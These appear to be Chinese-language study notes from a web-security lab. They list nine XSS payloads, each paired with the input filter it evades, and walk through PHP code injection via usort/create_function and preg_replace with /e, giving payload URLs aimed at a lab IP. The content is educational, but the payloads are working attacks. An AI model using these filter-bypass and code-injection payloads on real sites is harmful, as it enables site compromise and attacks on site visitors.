1.<script>alert(“xss”)</script>
普通xss
2.<Script>alert(“xss”)</Script>
大小写绕过,<script>被替换,preg_replace 函数替换成空
3.<scri<script>pt>alert(“xss”)</scri</script>pt> <script>被替换,preg_replace 函数替换成空
4.<img src=”1″ onerror=”alert(‘xss’)”> preg_match,’/script/i’不区分大小写识别,发现输出error,更换标签
5.<script>confirm(“xss”)</script> preg_match,’/alert/i’
6.xxs”;alert($a);// 输出结果在<script>中
7.xxs’;alert($a);// Htmlentities
8.
<script>alert(‘a’)</script>
<>转义,url后直接构造
9.
<script>alert(‘1’)</script>
读取#(锚点)后的内容
Code injection
example2:
usort+create_function 造成代码执行
usort():对一个数组进行排序
create_function():建造一个函数
关键性代码:
usort($users,create_function('$a, $b', 'return strcmp($a->'.$order.', $b->'.$order.');'));
<=>
function test($a,$b){
return strcmp($a->'.$order.', $b->'.$order.');
}
<=>
function test($a,$b){
return strcmp($a->id);}//, $b->);
}
payload:http://192.168.40.132/codeexec/example2.php?order=id);}phpinfo();//
注意payload中的}是为了闭合create_function()中的{ ,而并不是为了闭合issert{}中的{
example3:
preg_replace /e 造成代码执行 php<5.5.0
preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed
搜索subject中匹配pattern的部分, 以replacement进行替换。
payload:http://192.168.40.132/codeexec/example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
源代码示例:1
2
3
4$pattern=$_GET['pattern'];
$replacement=$_GET['replacement'];
$subject=$_GET['subject'];
echo preg_replace($pattern, $replacement,$subject);
payload:http://127.0.0.1/test.php?pattern=/hello/e&replacement=phpinfo();&subject=hello code_injection!